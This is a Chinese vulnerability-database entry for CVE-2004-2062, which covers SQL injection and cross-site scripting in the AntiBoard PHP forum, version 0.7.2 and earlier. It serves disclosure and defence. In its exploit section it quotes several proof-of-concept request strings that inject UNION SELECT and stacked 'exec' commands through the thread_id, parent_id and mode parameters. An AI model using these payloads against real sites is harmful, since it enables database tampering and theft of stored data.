AntiBoard SQL注入及跨站脚本攻击漏洞

AntiBoard SQL注入及跨站脚本攻击漏洞

漏洞ID 1108087 漏洞类型 输入验证
发布时间 2004-07-28 更新时间 2005-10-20
图片[1]-AntiBoard SQL注入及跨站脚本攻击漏洞-安全小百科CVE编号 CVE-2004-2062
图片[2]-AntiBoard SQL注入及跨站脚本攻击漏洞-安全小百科CNNVD-ID CNNVD-200412-484
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/24329
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-484
|漏洞详情
AntiBoard是一款基于PHP的论坛程序。AntiBoard对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞获得敏感信息或更改数据库。’antiboard.php’脚本没有正确过滤用户输入,远程攻击者可以通过’thread_id’和’parent_id’字段注入SQL命令,可更改原有数据库逻辑导致修改数据库数据或获得敏感信息。另外’antiboard.php’脚本也没有正确过滤HTML代码,因此攻击者可以构建恶意链接,诱使用户访问,可泄露目标用户基于COOKIE的验证信息。
|漏洞EXP
source: http://www.securityfocus.com/bid/10821/info

Multiple vulnerabilities are reported to exist in the application due to insufficient sanitization of user-supplied data. The issues include various instances of SQL injection and a cross-site scripting vulnerability.

AntiBoard versions 0.7.2 and prior are affected by these issues.

/antiboard.php?thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=threaded&sort_order=

/antiboard.php?range=all&mode=threaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--

/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&sort_order=ASC&mode=threaded

/antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=nested&reply=1

poster_name=1111&poster_email=1111&message_title=1111&message_body=1111&submit=Submit%2bmessage&thread_id=3&mode=1';%20exec%20whatever--&range=&parent_id=0&reply=reply

POST antiboard.php poster_name=1111&poster_email=1111&message_title=1111&message_body=1111&submit=Submit%2bmessage&thread_id=3&mode=threaded&range=&parent_id=1%20UNION
ALL select field from antiboard_emails----&reply=reply
|参考资料

来源:XF
名称:antiboard-get-sql-injection(16828)
链接:http://xforce.iss.net/xforce/xfdb/16828
来源:BID
名称:10821
链接:http://www.securityfocus.com/bid/10821
来源:SECUNIA
名称:12137
链接:http://secunia.com/advisories/12137
来源:BUGTRAQ
名称:20040728AntiBoard<=0.7.2XSS/SQLInjection
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109105610220965&w;=2
来源:NSFOCUS
名称:6748
链接:http://www.nsfocus.net/vulndb/6748

相关推荐: PHPRank Administrator Password Plain Text Storage Vulnerability

PHPRank Administrator Password Plain Text Storage Vulnerability 漏洞ID 1101397 漏洞类型 Design Error 发布时间 2002-10-10 更新时间 2002-10-10 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享